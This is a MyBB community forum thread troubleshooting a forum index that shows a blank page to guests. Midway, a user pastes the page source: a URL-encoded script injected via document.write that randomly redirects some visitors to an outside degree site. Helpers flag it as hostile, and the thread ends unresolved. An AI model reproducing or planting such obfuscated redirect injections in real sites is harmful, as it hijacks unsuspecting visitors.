MyBB Community Forums

Full Version: Index showing blank white page
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2
hello everyone, my forum index page is showing blank when not logged in. All the other pages are working correctly. How can i solve this problem?
A URL and test account might be useful Rolleyes
I found out the problem just now. Its the Online today plugin by crakter.
After I deactivated it my forum index is back.
But again when I activate it, its gone blank again. So, I have to keep it deactivated.
Is there any way to solve this problem becoz i want to use this plugin, thanks..
no, u'll have to let crakter know, there's a bug with it, since MattR didn't write it, or any of us.
I tried out another plugin similar to this i.e, Online today by ethernet. It causes a similar problem. I don't think its the problem with the plugin.
I have that plugin working on my forum fine... so, I'll ask again, URL and test account, please??
Ok, the source code of the blank page is this:

 
<script>document.write(unescape('%3C%73%63%72%69%70%74%3E%0D%0A%76%61%72%20%72%20%3D%20%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%3B%0D%0A%72%3D%72%2A%35%30%3B%0D%0A%69%66%28%72%3E%34%39%29%0D%0A%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%31%73%74%6F%6E%6C%69%6E%65%64%65%67%72%65%65%73%2E%63%6F%6D%2F%6F%6E%6C%69%6E%65%2D%64%65%67%72%65%65%73%2D%74%69%6D%65%6F%75%74%2E%68%74%6D%22%3B%0D%0A%3C%2F%73%63%72%69%70%74%3E'));</script>

This doesn't look friendly to me. If this is in a template, remove it. This isn't added by any plugin I've ever seen and it isn't default MyBB.
I can't find it. I even looked in Who's Online templates but I didn't find anything that looks like the above.
Do a template search for <script>
no results when i search for <script> or the above full code.
Pages: 1 2